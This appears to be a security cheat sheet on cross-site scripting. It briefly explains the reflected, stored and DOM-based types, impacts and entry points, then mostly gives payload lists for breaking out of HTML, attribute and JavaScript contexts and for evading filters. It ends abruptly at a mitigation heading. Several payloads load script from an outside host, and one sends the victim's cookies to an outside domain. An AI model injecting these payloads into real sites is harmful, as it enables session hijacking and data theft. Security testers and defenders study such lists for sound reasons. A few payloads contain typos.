# XSS

XSS (Cross Site Scripting) is a client-side code injection attack where an attacker can execute malicious scripts in the web browser.

### Impact

* **Account Hijacking**: Attackers could steal session cookies and take over victim's session. It could lead to administrative access in case of an administrator account hijack.
* **Credential Theft**: Theft of credentials such as passwords from a login page clone.
* **Data Leakage**: Personally identifiable information (PII) such as credit card number, SSN, or any data stored in the browser could be accessed.
* Redirect to malicious webpages, keylogging, downloading malware.
* Access geolocation, webcam, miccrophone, and files on system.

There are 3 types of XSS:

* Reflected (Non-persistent)
* Stored (Persistent)
* DOM-based

## Reflected (Non-Persistent)

When the payload is part of the request that is sent to the server and is reflected back in the response.

For example, a website's dashboard greets the user by their username. If the username is not sanitized properly, it could execute JS code.

## Stored (Persistent)

When the payload passed to the web application is stored on the server and executes when rendered elsewhere. 

For example, payloads could be saved as comments on a page and then when the comments are loaded, it could execute JS code.

## DOM-based

DOM objects are manipulated to execute malicious code. This is an advanced attack as the payload never reaches the WAFs and executes on the client-side.

For example, the "document.write(document.URL)"  could be used to retrieve malicious contents of some malicious site and execute it.

## Entry Points

Any user-controlled parameter such as:

* Input fields
* Host Headers, Referer
* URL redirection
* URI parameters
* File Upload (File name)

## # Payloads

### Popular

```
<script>alert(1)</script>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<iframe src="javascript:alert(1)">
<embed src=//14.rs>
<details ontoggle=alert(1) open>test</details>
<xss onclick="alert(1)" style=display:block>test</xss>
<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
<script>onerror=alert;throw 1</script>

Polyglots:
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`


```

### Context Breaking

#### HTML Context

Case:  \<tag> Searched for $input \</tag>

```
<svg onload=alert()>
</tag><svg onload=alert()>
```

#### Attribute Context

Case: \<tag attribute="$input">

```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
```

#### JavaScript Context

Case: \<script> var new something = '$input'; \<script>

```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```

### Bypassing

#### Without Event Handlers

```
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
```

#### Without Space

```
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
```

#### Without Slash (/)

```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```

#### Without closing angular bracket (>)

```
<svg onload=confirm()//
<svg onload=alert(1)<!--
```

#### Without alert, confirm, prompt

```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```

#### Without a Valid HTML tag

```
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it
```

## Mitigation

* L